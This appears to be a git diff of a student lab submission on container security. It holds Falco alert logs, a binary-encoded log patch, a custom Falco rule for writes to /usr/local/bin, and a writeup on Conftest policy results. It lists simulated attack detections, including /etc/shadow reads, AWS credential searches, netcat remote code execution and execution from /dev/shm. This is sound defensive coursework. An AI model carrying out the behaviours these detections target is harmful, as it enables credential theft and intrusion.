command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator 
container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1779098788016238773,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh","proc.cwd":"/","proc.exepath":"/usr/bin/dash","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-18T10:06:28.016238773Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:76:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:28.017081243+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file= proc_cwd=/ proc_pcmdline=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/usr/bin/dash parent=sh command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1779098788017081243,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh","proc.cwd":"/","proc.exepath":"/usr/bin/dash","proc.name":"sh","proc.pcmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh","proc.pname":"sh","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-18T10:06:28.017081243Z"} 
diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log new file mode 100644 index 0000000000000000000000000000000000000000..699d2aa8db1be1deaa34e4c1b5ef61279e7c68fc GIT binary patch literal 76154 zcmeI5X>(Lbc82Rie{zKXLm4~V<3)u42?R0fXj;Gw9=gE|cxK!lD?lubTP#LmXzUsP zbldN9-#VR{cd1pSDyb_JlB({K%gM}h-m~P%|NGx(y|=xC-VeR!z4yI-?}mOa_crx= zwYQ=F+xmN{x6^y1zni+d+1t|JE4up+`s^Rxxzl^nJ5)Ju_4$ugSx3EB`u3(OakDqj zdsp=LlJ5Va_oGU@+S}LfR`2h6f7$zs-p$Xx`s~ZkzWD6MXPckhsGhp^*)E@}Z#?l2 zdb4cnp~`>RJJR(RS?yow`=P!+)t!GEe!8wt=^3v2&HU_+Wfxvsdra2eWB0sO#Yvd_(u1Rdk=f>^v;3C;Dvsli*nri#h9@j zXoLnD)ls8$LuDVUC9l+umm0l(@4Ma~djF{Z->RP1RqfAvw>8EG`u`zjxJg&&qEqI=rf8*PiaZ*3T2Q;hE}+r(Fks=bgj!?p4)x zx9q(?wysit(m0)dyB>-XN1_p9*{{YL zIx%|ps&5~(D(n2YFD^W&es_A;^y#uV{%bvbAo{+osQ*GGZdB!Zy*<&LXS(uRae{k# z9=^h}@SQI!K7U|E-G8^W007dr-acD{;2Hiho?v$Wkwy2R`yE@vz7G zf2enPC%%6*>;tp%Q0;;D@YWTzo6mn;$&H7-uX_*l?Sc5wZT;}=k!H@V-tSfJO?|(s zdi%Qey;elO_fPu!M*sV2XI~}kh+bFJk{fFCRb6?kCwbm$czfnGa8LAs8t~$Nu^#)q z&qWisNxo*ktoSfvv!(m+6ll!226yRe-G2}r-s}I7dc(LpFL=SlqMjq&gUdc`scoPV z-p<^&?}p_bNfI#In!VxbZS@ej3}=J}pR09m^~rpkJ~rR$>sjQCIoV*rE&O}6f%@`R zwzcVfHD{QI@FF;9V5nn#gKyHiiy9MF(6K)G4aOt&xcuf30EvCR;9fSzA;(qcdmNB% ztd|&%yywdt0l4j}YMr;uxAV0Inmq);v|T;D5n24o_XxkOddgV86=x5=vFH`Q_}={> znTdR98^!jk=c)I>=Qmce|4n}1HcIE4?+3p>Ya?}7>Cvk&HqBXNEcr+AviHI``@(hT z{Hxj4r$Sz@7u>c$__mDnD~w?)Ktk_}u?Hlbb3d!~^!3kCdVW_MvBez-l^seR&Z5V^ z(fe3A7Gax!Yj^~0WjUzytz*^rTKaE(cb1mVV^KkSMf1RNgN^}0L=Qp#H#M>DJXL#N z=*PC*XG4AEjh+ch74{W$vmMFr9sOLD*11!?`AKUU3lbKd;(~=58$zOCWYnQ?(oqX6S$SE(}NPSgpef_gq(Q=yzK`&nv6R z)oKK3;}hxr7u3HC8siVD<6ZUF&yOC1ZI!vHeqvX_j&WU`-#4>($L+ZF`90>&YrBKSd6R@Gy1kO@;-A5`yJ&l2W*Linn;pk z&13A>yZZf6zXuhS`_<~>y+UPHZCCxyuiDm6J#in81{N5~@K_z`Ei5SM z>i)21dd=M16}Ej^wU+-_T|Vjm+sdBCGt5n9!EW!Dm6ZuE1Sl(6siTGs_4Yt_=@o0& z>i}xM6;BB(5B9b+3UzAjYPD`@CNujf2^#I|UHl$+M0RCs`JI0EWuyC6_O3@7*RN!& zyDfWf+_~4gue-N(e_wZQ$~wm9w(;B_(sf5QJP~y__5ZqhzpYQtDq1%2EWW0;x3H+t2l@j|v6sND;JJ7|c6IkqR~b+9zq;Lw)}}I;buaaneNWd_ z>kp#akxI8ECU0jNxp)Rn+4e+pO+tPAEZ8iMsuj&jZ}xDYr=C^!FQ^^u^mOU%??%rC 
zt<*7R$SE{gS*DWT4oY>uS@JFW+Ule0x4oVR8iV&5g@O7TGt_m(T%2~6mZgUs4%+74 z0_wOVZhuX4Z&SZ;et2S&Bf?>$t-*WT!kquOR?m%r=HHQel+ywZ!#bw4c*?V^`?=sk zcx_&5W+2Cy*{&^mm<9NY5NsJe`^o z=b{uiDcm5uuZd6dES$Q0s%%Y20ki5h02S2p}LVK@Z&R%QXqw`4hfBK0sNMk(0rWa_=+6ZlYsn4KcC>eg6znXX+?9|X{y&bkW zpv}L~>PD}|%N-siw~KMe5fjv79e_WLC>UY;Xvz`Bg6S))7@lE7_lI(vaX8R5=7BNH zi>jY!D=zP@yo|I8zQSDjpyxrA$zulxB8~-{iAyuCnN)k7mOh?=p3UYZ(F=O`c_$6A zR-mlX{|+m6v- zF4~jp`4Il!7#nk%+?O9Z{Xi|brS>o`%*7}fjmsKaNDSKbVK{os#*dnl?}baymeF9C z|C6*Ciojd2v+$1l;Q3GVPAVBo0qX@G=%@o?1Bfs|o}jNA+0Qc4i&`J2#Xn*-on77$ zJvdFi5p{M^ZI+qz>4as`GI>T$AImNH0-WXN&M!VqVX2%}rk)PZ2z1po_xrNztTNh& z_MaZVh#I>n_VeZzId#^&0?rA3GWwp}tFhX=0=#Yw@GR;lF+<&p)8`wbski1HXt{|- zYaWvGkh86y_uU%N_&;M z{l($m$-Vz!S;arkePX+tHC>d&m6oxSWuV_5^@~+Dypg-I+Sv>Kt#+H-R*&uuz2#hg zB)|A$*>v}0%i{ZbCT>KdH=Hy82j_`3DWJJG)n! zlvw-S9UqfoD(th$V`0{Q_cE%&6bfHL}Rq2()HnX>%>;RXmC{8ridi46<5dRRr?l|(>!-#Q5x;c`|k=uccQX~Uc&;;KK zKN1x|th;sB;7yKSaLmJj^fyOR=F#AI1Facv=x)RUZ7A{ss|WEASfubX5YwHF(;OJv~pXQR1W<(kDM?cgBvM{SWmbwe?6(h6Xjd zWqq}_jAC!fGcrC9EePMvYcWNTcF>hrsX+9*8o4t1*833HW3r_&C8N+~p{G%$y*|;> zQrq^0jmxYpM1*@sK*UlqH+Izn&>fkOu2-$5<#~$_G)n9`xTvd5s^w*|uYuV7I#sTz zY<6cr5r4X>PejlyZ#Tr~S)KR4j4jUXFkW?eZkknDA*_4H?6JdS)SC5}=DRq?QHHgf z?`-jYlvpLX&1rn}d%Lx$eV%#m%N5nWt$E1qA@(`F(7bx8Pwnrt@dxv*_U993>)M@> zr~@Yj57;93N$X=0N|(H?#L$+JwhuyOY>=z8pQDTRU3&4P7jk#tp%v=7$5daMs-IHY&80I4MS<<~Ecvx}Jor=4*LyJF#ySjDW-;!W@kUJq%qU zv^Dz?o5H9n&LD&u^gGj zo>rtG^Cj8NgEu-_eil3VD9w49di<8OC-gp~C0gILnw|U`>5gzxXu%E#sDoaOFPF>! 
z%ooP$*ZRL#>A^8m0r9!(3ai#)eqRIS?5UG|Of*Slcx zi<1YC+_mHwz=CV7Fs{ANuB8(3EkDz|3hBSA{=Ac(v87Uc$0LnhU{_Ba=x&?7SN13E zYR^63;bEG8|2x|KbebJ|I{eN&8da1MJ^51O{i8 zv%Tbp;zNo5_-XT?@~Pl7K-xz&vN#h1k!ABrDY+_>lMDk zl73nKkW0dx*zL=FM`cV6BMt_4ju~f{FZXMM*P$SD!CA-Ii=Q%4z0~!mKkblxBaFgc zbFd8fgtxrPU+OBD#vY|SZZR^vgQduC1>$XbWKwpTmkn=Cd9UuvNp~$Na$K56elHeZ zj@EC3O3B9-c7-;N!uYasJlaGTxz)?)FSqcIE1l7WSCrnoW=<G)GR1LKw)B5;3^6*^wrhB)7*{Edzh#yK!9ad>GVuV~9JZ zSHuP%iqDgI2g@G1$?R6mc67H)tcm@Qv#`LMSM*cg9bC?mGINWu;mzt46)*^xvZNci zSD8Ct8Rrp#j!>1H%jm!L=%jbLpJ$QFZC7nx1?MPk!!p71i04W1Enrx7U%b&i^Q&xoi5~=Sc2W>;5`CB>W9L*VuURLMcZ=XZ$c2f6k@mWK=kk;Dj>fEA>%rM$T zdvp4x{QY@YU0J8Ak&Tqhq)i#pjiGaH=rK&3cQEA0AT#@f^LxQdom6iM{Db4m(=WfsxFNu!OUF}x!!_0mL4r{>TgeirOQ5sjCM)k zsasCg))G~@MJ4vW^OGzOd_{yp6JPn=`H=SIA=0)Kc8N{S>g$Wg)~x4P11EvEo7`!c zc$>`4*M+sW#5F#8Ea&nH+(s+~j0(=9=4lK5y zL0fKp`T#WqKjEHH+izzx^HrzwbglTb+*kn-;>lO zuS!h-zV}j+<%WJwEHv#dcSh15q&bRDW9L#`red=-I_y_ zpS$kU#QtZW+nQ#9uO_vy)9?D5CAw~VV(|z+oszKVa~8%U_8jTplh4sdU)goA|AEq) zcqio_!nVu`m=DjNSIc>mTPz33lWmH9y__|6wL`EhwO+QuEd8>E{~BCt(;bd*Nv zYYEJWt;Eq8PZZ^0OodKh-c5Wr7Fl$Fs5Rk#&J4&SH|l!->{j@CBu5j~y-JT2P8@z}U%g~;fYsqHw@0tnu z4)1|7gV_t%oWG%`k*BAelYgTUsqv_q-FR^OS}Eu#Ypfsp@|meV*(=ARDSBj$^;Z+? 
zPlIuHBq^G5q8sC$tq7B8cVnJb?8)l!y*hR-y|STEVUs5NW5i02=J)k7OFW)vP=Bs2 z+g7s^C(qhD723#T_!q4sy*G~?JTGZOw8k2K68;O;c#KGl;jQ5a z-cj4x)#tsQKM3z~GUPS=MJwdA&P}zW9r3PXSMXMh&s&3LkupW$0a)Ybw8#HQG@K?w zjpa*I2VaJ*JmnEG0vVr6sQtWW_sQIEpxH8c{5R;l$;Z3Vc{6sU8ULNfQlF+}dR6&f z9pg=gd{b}g@0a+p`?;T&?KziHIo1eCl_QCeR;KLiSd-lQ%d#}H#__QcOI*&7`65P) zG@CqOSxA%ok(~DpqPSMk8=G^v8!+EX%3e>X@`L08@eYh``u0)x+9F7>0+Q3DEuPgD z!l%SfU(+cFzf?_M=)^jZDwxPJ+nFnVp-d#4C-6Z3_jih`WgjO3OU=*Lw`7L0d70*9exq9zLheSnoU_Sm*w8Hi^aX zKufmSkS&>t>T;tS+2;JswHn#B<=F^6Sw4rig1kbEZ;pXoPKny`Hxu7(e=}r+=S^An zY2xc~ytI8swR;*od(vo&(RJ0!ENMI4yLFU2S_af>UM+iVj)UCNGNO7EGV+SpC~LEd+q-8j@tvN*rpc~GXYe9}m`m%b1q?M!RyOyc+<#Z!w+IIS zQRTTb{!m4ngx>6RMl=If%?zp0aW+^^T7`H?)o}VSk#kxBQMj4HGC;^n=8s@{h z%d!zqf`{k9zD>TiOzg{kLiWeu(ITVK^^sQMheDA=fD!|GR9VtLR(b(32hIf7%;{3k zYE2vh)<@?P@ly=T+ zqG_RQqCb(c^_b?-I(%DG#YN29?BEjoc+@E={@Ft(`REKTcCOm=^cu zd_A;=c_Ow)=K#!WLy9mHf(Js;c5MckGTDS_N$puUDTns#OzoR2LM3EI{q1rk z(1!XG?eW(+k~ukS(X89OGlfnjLUKBs*43gwYSFU!V&UsLU!rck{DC;Z+- z>h9z0TANRbB=Usps4lIEFnxW#d@#XLebOm5_;P$AngmD45!nIW)QIDxmr{l-kB!N*OpV zYNU(r)k`UnX<2Xm**bno8eJRDtiQclm}(N6c`0q~HDsz~=z~`IxhKm|xl6_Lm>qxN zGmBIF4k|C3OKeJNU!OKoq=^HNt4BftaCM?i^0QY$_68Q4$7bGKm&?Rn?9{@NOddYl z&PQXfUsbklav1~#9Wlh7{pVHI1oC*0;{|*|rf{EF^Q=N@W#;Qw6~%oX3-}ErhDCju zsEde{vzR}cEZ&^vP5jN;-nvF+^^@bfxaS&~fxmt$LAENI1+a-qUdg|we-pEUYe(&=o9_SM`j*!g1sY&Js4asa8 z&yLox+Hi6t7Mz6I+A$#`=FGO_Si&>-dT8;Q&yF@ptV3>vKM5??T*=GAauHFzqj4Zt zFnal=TKvOaH7`K6M!6~Hp2q`QTGJZY*GzKkFK0@Ex7J=SizJ!#9FDxJTT&Sf8O?W)Hf zG<#A;5=1LvUj{XBM$>^PwdnIrID0zL#`PvkU>czt!>3Y4Jf4DX=xO6=0u6FsKlKu2 z#V*M*n&Xz9^uB}dHBa8irh2mY^NwWm{odD-(qC(wzt%3wTdJWsM(fPT>uhPOl`X9~ zM+Xg#h_7!lo|t1qR`P7|18u9x(%)QdQ1OV^*H`k_^112kk=H70P)et~N5M<&`^@>N zYdzg4gXYNP62L7AF5G^e^fdgkS>Ci~o^Cz0iFud+(b&oSN3Md8&p|2ZRJy}r#e zo%HsS_qd%2`IWYWpzM4xh$Y$_-OhS@>PWQ76Gvh4)xwe`LU2z@B$;Mk!VhgS+wabX z6~B>>U-UOpRYIkK(V?V{p=R7r_#IUINunL{uQ-sTcy=KlACJL3n6Rv zA8?OoauBv-L7(Z3OQOqD{RfrqRM$bP&-D(^aOXhy^+2WA-o2$VcJv*z&MA5LB=ClB z=!K5JM#M_GZZKwz=^gv?lVx$QpBhTDzDiLr2m#m*R9K3^OKqgw8eIgQ9ztiDYy 
zxJ+!mE%Zr-1vI5A`h0l|HvdL)>R7V?oEB+s1xv z)m>Y4SJSFHdxXKs?`1-tuk+$=d>q^no9OA|<5@XS9TSzhdzUq~jfd7tDv=p))SsxM zx6xd;{`OfzZ>606RwF_<18@!Enu$x=aj*4V(Q|M3y=y?&#f3zm}ALuNe?$*n`6INLLVw zPbOoB6P5{MJA2kaX~`yTOoq3gSS_fI1nyc9C{bpGzNec@hK~Z{#-4 z(Y((XF1K;Ij1Bc0t8)A3p3SjrN5r7!a;N7S!>%#xYGYVr-p9(9fuSSUDPLsb{ zf}6(nZ^)zkN=ana$k|E&+n$_$&sgHa; zVgqW_-z;^4wkLjGIsvi1fs^|3mX|27ul*-zlVH9kT1va9h?-|j%&rMw<2{eLg3%0` z{9~D#fzQa;7OvgV&lPD0rDl+yq|(=pBlu|7^0eCkbPp8F9~9K!jESQtkw+knxn*HOHj{PL;NVMa$2wrc?E zh=sGAk#<@%*yNwxXfWqAr;i55@ql)YSw~EhVXe`1)yphV*mUo zUEqfeba^!DB5xqgoQXi ze;{EyhY><;Do<-ia~rSYOu$Nc-8!RdXHzp!)+Ge z@I-(rQvHj-nfCK1s+ByuE&eq!SkD`G;F^6BLVZ@uw~z03!w+?5IRDT|{wRHvnYW>l z`p-)5{HVBRB9)1FXt&^+D(jerQ9EYV7#Ev%ehQwY<=Mu#_QVacXdd@!)`%V>0aoF$ z)|~mhOFX%}3B;e(JV2pZT5zX;@(G^KPh4@V8_$- z3hgfAe1chb;I-rPWorvqrqN;8UAAm(;dZrO&l$~9G)a!kgVRi|E36{dOq#%26JZ}> zaQwO^;<2mSsaJDE*ZRi#Jc#vq5I&;}jo|e3ja+INS%g+Hon7DBMkx>1+QvZ(ep{AR zr;hhmQQKHW=~Sm%-N!+j>(5LQ* + Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags) + priority: WARNING + tags: [container, compliance, drift] diff --git a/labs/submission9.md b/labs/submission9.md new file mode 100644 index 00000000..699372f0 --- /dev/null +++ b/labs/submission9.md 
@@ -0,0 +1,222 @@ +# Lab 9 — Monitoring & Compliance: Falco Runtime Detection + Conftest Policies + +## Environment + +- OS: Windows + PowerShell +- Docker: Docker Desktop with Linux containers / WSL2 backend +- Runtime detection tool: Falco 0.43.1 +- Falco engine: modern BPF probe +- Policy-as-code tool: Conftest with OPA/Rego +- Runtime test container: alpine:3.19 +- Branch: feature/lab9 + +## Task 1 — Falco Runtime Security Detection + +### Falco setup + +I started a helper container based on Alpine: + + docker run -d --name lab9-helper alpine:3.19 sleep 1d + +Then I ran Falco in a privileged container with Docker socket and host system mounts. Falco loaded the default rules and my custom rule file from: + + labs/lab9/falco/rules/custom-rules.yaml + +Falco logs show that the custom rules file was loaded successfully: + + /etc/falco/rules.d/custom-rules.yaml | schema validation: ok + +Evidence files: + +- labs/lab9/falco/logs/falco.log +- labs/lab9/analysis/falco-alerts-summary.txt +- labs/lab9/falco/rules/custom-rules.yaml + +### Baseline alert: terminal shell in container + +I triggered a shell event inside the helper container: + + docker exec -it lab9-helper /bin/sh -lc "echo hello-from-shell" + +Falco detected this as: + + Terminal shell in container + +This alert matters because an interactive shell inside a container can indicate manual debugging, lateral movement, or post-exploitation activity. In a production environment, unexpected shell execution inside a container should be investigated. + +Evidence: + + rule="Terminal shell in container" + container_name=lab9-helper + process=sh + command=sh -lc echo hello-from-shell + priority=Notice + +### Custom Falco rule + +I created a custom rule named: + + Write Binary Under UsrLocalBin + +Rule file: + + labs/lab9/falco/rules/custom-rules.yaml + +The purpose of this rule is to detect write operations under /usr/local/bin inside a container. 
This is useful because writing new files into binary directories can indicate container drift, unauthorized tool installation, or persistence attempts.
+
+Custom rule logic:
+
+ evt.type in (open, openat, openat2, creat)
+ evt.is_open_write=true
+ fd.name startswith /usr/local/bin/
+ container.id != host
+
+### Custom rule validation
+
+I triggered file writes inside the container:
+
+ docker exec --user 0 lab9-helper /bin/sh -lc "echo boom > /usr/local/bin/drift.txt"
+ docker exec --user 0 lab9-helper /bin/sh -lc "echo custom-test > /usr/local/bin/custom-rule.txt"
+
+Falco detected both writes using my custom rule:
+
+ Falco Custom: File write in /usr/local/bin
+
+Evidence:
+
+ rule="Write Binary Under UsrLocalBin"
+ file=/usr/local/bin/drift.txt
+ container_name=lab9-helper
+ user=root
+ priority=Warning
+
+ rule="Write Binary Under UsrLocalBin"
+ file=/usr/local/bin/custom-rule.txt
+ container_name=lab9-helper
+ user=root
+ priority=Warning
+
+### Tuning notes
+
+This custom rule should fire when a process inside a container writes to /usr/local/bin. It is useful for detecting container drift and unexpected binary placement.
+
+It should not fire for normal application writes outside binary directories, such as writes to /tmp, /var/log, or application data directories. In a production environment, this rule may need allowlists for trusted image build processes, package managers, init scripts, or containers that legitimately manage binaries at runtime. 
+
+### Falco event generator
+
+I also ran the Falco event generator:
+
+ docker run --rm --name eventgen --privileged -v /proc:/host/proc:ro -v /dev:/host/dev falcosecurity/event-generator:latest run syscall
+
+Falco captured additional runtime security events, including:
+
+- Disallowed SSH connection on a non-standard port
+- Sensitive file read from /etc/shadow
+- AWS credentials search activity
+- Symlink and hardlink creation over sensitive files
+- Fileless execution via memfd_create
+- Execution from /dev/shm
+- Netcat remote code execution pattern
+- Log tampering activity
+- PTRACE activity
+
+These alerts show that Falco is able to detect suspicious runtime behavior from containers using syscall-level monitoring.
+
+## Task 2 — Policy-as-Code with Conftest
+
+### Reviewed files
+
+Kubernetes manifests:
+
+- labs/lab9/manifests/k8s/juice-unhardened.yaml
+- labs/lab9/manifests/k8s/juice-hardened.yaml
+
+Docker Compose manifest:
+
+- labs/lab9/manifests/compose/juice-compose.yml
+
+Rego policies:
+
+- labs/lab9/policies/k8s-security.rego
+- labs/lab9/policies/compose-security.rego
+
+Evidence files:
+
+- labs/lab9/analysis/conftest-unhardened.txt
+- labs/lab9/analysis/conftest-hardened.txt
+- labs/lab9/analysis/conftest-compose.txt
+
+### Unhardened Kubernetes manifest result
+
+The unhardened Kubernetes manifest failed Conftest checks:
+
+ 30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions
+
+Policy warnings:
+
+ container "juice" should define livenessProbe
+ container "juice" should define readinessProbe
+
+Policy failures:
+
+ container "juice" missing resources.limits.cpu
+ container "juice" missing resources.limits.memory
+ container "juice" missing resources.requests.cpu
+ container "juice" missing resources.requests.memory
+ container "juice" must set allowPrivilegeEscalation: false
+ container "juice" must set readOnlyRootFilesystem: true
+ container "juice" must set runAsNonRoot: true
+ container "juice" uses disallowed :latest tag
+
+### 
Security analysis of the violations
+
+Missing resource requests and limits are dangerous because a container can consume too much CPU or memory and affect other workloads on the same node. Resource limits support availability and isolation.
+
+Missing allowPrivilegeEscalation: false is dangerous because a process may be able to gain more privileges than intended. Disabling privilege escalation is a standard hardening control.
+
+Missing readOnlyRootFilesystem: true allows the container to write to its root filesystem. This increases the risk of persistence, tampering, and runtime drift.
+
+Missing runAsNonRoot: true allows the container to run as root. Running as root increases the impact of a container escape or application compromise.
+
+Using the :latest tag is unsafe because it is mutable. The deployed image may change without a manifest change, making deployments less reproducible and harder to audit.
+
+Missing liveness and readiness probes reduce operational reliability. Kubernetes cannot accurately detect unhealthy containers or control when a pod is ready to receive traffic.
+
+### Hardened Kubernetes manifest result
+
+The hardened Kubernetes manifest passed all policy checks:
+
+ 30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions
+
+This means the hardened manifest satisfies the policy requirements enforced by the Rego rules.
+
+The hardening changes include:
+
+- fixed image tag instead of :latest
+- CPU and memory requests
+- CPU and memory limits
+- allowPrivilegeEscalation: false
+- readOnlyRootFilesystem: true
+- runAsNonRoot: true
+- liveness probe
+- readiness probe
+
+These settings improve security, reproducibility, and reliability.
+
+### Docker Compose manifest result
+
+The Docker Compose manifest passed all policy checks:
+
+ 15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions
+
+This means the Compose manifest satisfies the provided Docker Compose security policy. 
The policy checks help ensure that container configuration follows hardening expectations such as avoiding privileged execution and insecure runtime patterns.
+
+## Conclusion
+
+This lab demonstrated two important DevSecOps practices.
+
+First, Falco was used for runtime detection. It detected an interactive shell in a container, writes into /usr/local/bin, and multiple suspicious behaviors generated by the Falco event generator.
+
+Second, Conftest was used for policy-as-code. The unhardened Kubernetes manifest failed because it lacked several security controls, while the hardened manifest and Docker Compose manifest passed the policy checks.
+
+Together, these tools show how runtime monitoring and preventive compliance checks can be combined to improve container and deployment security.